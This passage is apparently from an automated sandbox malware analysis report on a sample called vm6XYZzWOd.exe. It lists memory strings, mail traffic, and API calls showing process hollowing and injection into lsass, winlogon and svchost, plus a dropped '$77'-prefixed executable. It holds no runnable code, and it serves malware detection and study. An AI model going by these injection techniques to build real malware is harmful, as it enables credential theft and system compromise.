                      Source: lsass.exe, 00000009.00000002.3581324769.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2328869509.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.
                      Source: lsass.exe, 00000009.00000000.2329224695.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2329003857.00000140AE09D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3591266818.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2525299614.00000140AE19D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                      Source: powershell.exe, 00000004.00000002.2328455416.000002638022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: svchost.exe, 00000013.00000000.2398720789.000001A204EE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                      Source: lsass.exe, 00000009.00000000.2328513124.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3567403959.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                      Source: lsass.exe, 00000009.00000000.2328513124.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3567403959.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2328455416.0000026380001000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003890000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: lsass.exe, 00000009.00000000.2328513124.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2328540843.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3568613188.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3567403959.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
                      Source: lsass.exe, 00000009.00000002.3567403959.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: lsass.exe, 00000009.00000000.2328513124.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3567403959.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
                      Source: lsass.exe, 00000009.00000002.3567403959.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
                      Source: powershell.exe, 00000004.00000002.2328455416.000002638022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: lsass.exe, 00000009.00000000.2329420813.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3593143472.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2329420813.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3593143472.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                      Source: svchost.exe, 0000001D.00000000.2428879469.000001E709ED9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msftconnecttest.com
                      Source: powershell.exe, 00000004.00000002.2328455416.0000026380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000004.00000002.2431183217.000002639006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000004.00000002.2431183217.000002639006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000004.00000002.2431183217.000002639006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: svchost.exe, 00000029.00000000.2501335133.00000181CF58B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.3627240704.00000181CF58B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.3630958265.00000181CF6A5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.2499006036.00000181CEFA3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.3608641216.00000181CEFA3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comSRD1%
                      Source: powershell.exe, 00000004.00000002.2328455416.000002638022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2336449142.0000000007630000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2336449142.0000000007630000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2336449142.0000000007630000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: powershell.exe, 00000004.00000002.2328455416.000002638114B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000004.00000002.2477130032.00000263FE117000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.micros2
                      Source: powershell.exe, 00000004.00000002.2431183217.000002639006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: svchost.exe, 00000029.00000000.2497725256.00000181CE673000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                      Source: svchost.exe, 00000029.00000002.3575637518.00000181CE673000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.2497725256.00000181CE673000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com9
                      Source: svchost.exe, 00000029.00000002.3632977126.00000181CF754000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.3575637518.00000181CE673000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.2497725256.00000181CE673000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comSRD1-
                      Source: svchost.exe, 00000029.00000002.3632977126.00000181CF754000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comSRD13
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2336449142.0000000007630000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2336449142.0000000007630000.00000004.08000000.00040000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: svchost.exe, 00000029.00000002.3632977126.00000181CF754000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.2501644507.00000181CF5EC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.3628966949.00000181CF5EC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.2499307462.00000181CEFD5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.3612719143.00000181CEFD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comSRD1#

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: SMTPNetwork traffic detected: Mail traffic on many different IPs 89

                      System Summary

                      barindex
                      Source: unknownProcess created: Commandline size = 5545
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848F20A4E NtUnmapViewOfSection,4_2_00007FF848F20A4E
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848F20FF8 NtResumeThread,4_2_00007FF848F20FF8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848F20C6D NtWriteVirtualMemory,4_2_00007FF848F20C6D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848F20F30 NtSetContextThread,4_2_00007FF848F20F30
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140001860 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,FindCloseChangeNotification,CloseHandle,7_2_0000000140001860
                      Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E858982950 NtEnumerateValueKey,NtEnumerateValueKey,8_2_000001E858982950
                      Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE8620DC NtQuerySystemInformation,StrCmpNIW,9_2_00000140AE8620DC
                      Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE8625C4 NtQueryDirectoryFileEx,GetFileType,StrCpyW,9_2_00000140AE8625C4
                      Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
                      Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_hc0tk3g5.l1r.ps1Jump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeCode function: 0_2_01E520D00_2_01E520D0
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeCode function: 0_2_01E50B500_2_01E50B50
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeCode function: 0_2_01E50E280_2_01E50E28
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeCode function: 0_2_01E5178D0_2_01E5178D
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeCode function: 0_2_01E521810_2_01E52181
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeCode function: 0_2_01E524080_2_01E52408
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeCode function: 0_2_01E5EC900_2_01E5EC90
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeCode function: 0_2_01E50ED90_2_01E50ED9
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeCode function: 0_2_01E50E620_2_01E50E62
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeCode function: 0_2_01E50E190_2_01E50E19
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeCode function: 0_2_01E5188F0_2_01E5188F
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeCode function: 0_2_07E3D1480_2_07E3D148
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeCode function: 0_2_07E200400_2_07E20040
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeCode function: 0_2_07E2003F0_2_07E2003F
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeCode function: 0_2_07E3CDA00_2_07E3CDA0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848F1DD684_2_00007FF848F1DD68
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848F1E3394_2_00007FF848F1E339
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00FE15AF6_2_00FE15AF
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_3_000001B094BAD49C7_3_000001B094BAD49C
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_3_000001B094BA1FB47_3_000001B094BA1FB4
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_3_000001B094BB3C087_3_000001B094BB3C08
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140001CE87_2_0000000140001CE8
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140002D4C7_2_0000000140002D4C
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_000000014000242C7_2_000000014000242C
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_00000001400031D07_2_00000001400031D0
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_00000001400012747_2_0000000140001274
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_000001B094E9E09C7_2_000001B094E9E09C
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_000001B094EA48087_2_000001B094EA4808
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_000001B094E92BB47_2_000001B094E92BB4
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_000001B094EB64CF7_2_000001B094EB64CF
                      Source: C:\Windows\System32\winlogon.exeCode function: 8_3_000001E858951FB48_3_000001E858951FB4
                      Source: C:\Windows\System32\winlogon.exeCode function: 8_3_000001E85895D49C8_3_000001E85895D49C
                      Source: C:\Windows\System32\winlogon.exeCode function: 8_3_000001E858963C088_3_000001E858963C08
                      Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E858982BB48_2_000001E858982BB4
                      Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E85898E09C8_2_000001E85898E09C
                      Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589948088_2_000001E858994808
                      Source: C:\Windows\System32\lsass.exeCode function: 9_3_00000140ADFCD49C9_3_00000140ADFCD49C
                      Source: C:\Windows\System32\lsass.exeCode function: 9_3_00000140ADFD3C089_3_00000140ADFD3C08
                      Source: C:\Windows\System32\lsass.exeCode function: 9_3_00000140ADFC1FB49_3_00000140ADFC1FB4
                      Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE8748089_2_00000140AE874808
                      Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE862BB49_2_00000140AE862BB4
                      Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE86E09C9_2_00000140AE86E09C
                      Source: C:\Windows\System32\svchost.exeCode function: 10_3_00000195DD5A3C0810_3_00000195DD5A3C08
                      Source: C:\Windows\System32\svchost.exeCode function: 10_3_00000195DD59D49C10_3_00000195DD59D49C
                      Source: C:\Windows\System32\svchost.exeCode function: 10_3_00000195DD591FB410_3_00000195DD591FB4
                      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000195DD5D480810_2_00000195DD5D4808
                      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000195DD5CE09C10_2_00000195DD5CE09C
                      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000195DD5C2BB410_2_00000195DD5C2BB4
                      Source: C:\Windows\System32\dwm.exeCode function: 11_3_000001160CA43C0811_3_000001160CA43C08
                      Source: C:\Windows\System32\dwm.exeCode function: 11_3_000001160CA31FB411_3_000001160CA31FB4
                      Source: C:\Windows\System32\dwm.exeCode function: 11_3_000001160CA3D49C11_3_000001160CA3D49C
                      Source: C:\Windows\System32\svchost.exeCode function: 12_3_00000257E107D49C12_3_00000257E107D49C
                      Source: C:\Windows\System32\svchost.exeCode function: 12_3_00000257E1071FB412_3_00000257E1071FB4
                      Source: C:\Windows\System32\svchost.exeCode function: 12_3_00000257E1083C0812_3_00000257E1083C08
                      Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000257E10AE09C12_2_00000257E10AE09C
                      Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000257E10A2BB412_2_00000257E10A2BB4
                      Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000257E10B480812_2_00000257E10B4808
                      Source: C:\Windows\System32\svchost.exeCode function: 13_3_000001F28C1D1FB413_3_000001F28C1D1FB4
                      Source: C:\Windows\System32\svchost.exeCode function: 13_3_000001F28C1E3C0813_3_000001F28C1E3C08
                      Source: C:\Windows\System32\svchost.exeCode function: 13_3_000001F28C1DD49C13_3_000001F28C1DD49C
                      Source: C:\Windows\System32\svchost.exeCode function: 13_2_000001F28C93E09C13_2_000001F28C93E09C
                      Source: C:\Windows\System32\svchost.exeCode function: 13_2_000001F28C932BB413_2_000001F28C932BB4
                      Source: C:\Windows\System32\svchost.exeCode function: 13_2_000001F28C94480813_2_000001F28C944808
                      Source: C:\Windows\System32\svchost.exeCode function: 14_3_000001CA97FE3C0814_3_000001CA97FE3C08
                      Source: C:\Windows\System32\svchost.exeCode function: 14_3_000001CA97FD1FB414_3_000001CA97FD1FB4
                      Source: C:\Windows\System32\svchost.exeCode function: 14_3_000001CA97FDD49C14_3_000001CA97FDD49C
                      Source: C:\Windows\System32\svchost.exeCode function: 14_2_000001CA9854E09C14_2_000001CA9854E09C
                      Source: C:\Windows\System32\svchost.exeCode function: 14_2_000001CA98542BB414_2_000001CA98542BB4
                      Source: C:\Windows\System32\svchost.exeCode function: 14_2_000001CA9855480814_2_000001CA98554808
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001D2652ED49C15_3_000001D2652ED49C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001D2652E1FB415_3_000001D2652E1FB4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001D2652F3C0815_3_000001D2652F3C08
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001D26531E09C15_2_000001D26531E09C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001D265312BB415_2_000001D265312BB4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001D26532480815_2_000001D265324808
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00000254A27C1FB416_3_00000254A27C1FB4
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00000254A27D3C0816_3_00000254A27D3C08
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00000254A27CD49C16_3_00000254A27CD49C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000254A2D42BB416_2_00000254A2D42BB4
                      Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000254A2D4E09C16_2_00000254A2D4E09C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000254A2D5480816_2_00000254A2D54808
                      Source: C:\Windows\System32\svchost.exeCode function: 17_3_0000024B87DAD49C17_3_0000024B87DAD49C
                      Source: C:\Windows\System32\svchost.exeCode function: 17_3_0000024B87DB3C0817_3_0000024B87DB3C08
                      Source: C:\Windows\System32\svchost.exeCode function: 17_3_0000024B87DA1FB417_3_0000024B87DA1FB4
                      Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000024B87DDE09C17_2_0000024B87DDE09C
                      Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000024B87DE480817_2_0000024B87DE4808
                      Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000024B87DD2BB417_2_0000024B87DD2BB4
                      Source: C:\Windows\System32\svchost.exeCode function: 18_3_00000205FB3CD49C18_3_00000205FB3CD49C
                      Source: C:\Windows\System32\svchost.exeCode function: 18_3_00000205FB3C1FB418_3_00000205FB3C1FB4
                      Source: C:\Windows\System32\svchost.exeCode function: 18_3_00000205FB3D3C0818_3_00000205FB3D3C08
                      Source: C:\Windows\System32\svchost.exeCode function: 18_2_00000205FD40E09C18_2_00000205FD40E09C
                      Source: C:\Windows\System32\svchost.exeCode function: 18_2_00000205FD402BB418_2_00000205FD402BB4
                      Source: C:\Windows\System32\svchost.exeCode function: 18_2_00000205FD41480818_2_00000205FD414808
                      Source: C:\Windows\System32\svchost.exeCode function: 19_3_000001A20567D49C19_3_000001A20567D49C
                      Source: C:\Windows\System32\svchost.exeCode function: 19_3_000001A205671FB419_3_000001A205671FB4
                      Source: C:\Windows\System32\svchost.exeCode function: 19_3_000001A205683C0819_3_000001A205683C08
                      Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001A2056AE09C19_2_000001A2056AE09C
                      Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001A2056A2BB419_2_000001A2056A2BB4
                      Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001A2056B480819_2_000001A2056B4808
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeCode function: 21_2_01AF20D021_2_01AF20D0
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeCode function: 21_2_01AF0B5021_2_01AF0B50
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeCode function: 21_2_01AF0E2821_2_01AF0E28
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeCode function: 21_2_01AF178D21_2_01AF178D
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeCode function: 21_2_01AF218121_2_01AF2181
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeCode function: 21_2_01AF240821_2_01AF2408
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeCode function: 21_2_01AFEC9021_2_01AFEC90
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeCode function: 21_2_01AF0ED921_2_01AF0ED9
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeCode function: 21_2_01AF0E1921_2_01AF0E19
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeCode function: 21_2_01AF0E6221_2_01AF0E62
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeCode function: 21_2_01AF188F21_2_01AF188F
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeCode function: 21_2_07C6D9B021_2_07C6D9B0
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeCode function: 21_2_07C6D14821_2_07C6D148
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeCode function: 21_2_07C5004021_2_07C50040
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeCode function: 21_2_07C5003E21_2_07C5003E
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeCode function: 21_2_07C6CDA021_2_07C6CDA0
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: String function: 00FD6A20 appears 32 times
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2329340296.0000000007060000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameLitdkxvz.dll" vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2300253783.0000000003838000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclrjit.dllT vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2300253783.0000000003838000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2300253783.0000000003838000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $jq,\\StringFileInfo\\040904B0\\OriginalFilename vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2336961544.0000000007780000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2298907030.000000000188E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006A90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2338353530.0000000007E41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKaxhwswfup.exe6 vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006BAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000000.1944760132.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameKaxhwswfup.exe6 vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2336449142.0000000007630000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLitdkxvz.dll" vs vm6XYZzWOd.exe
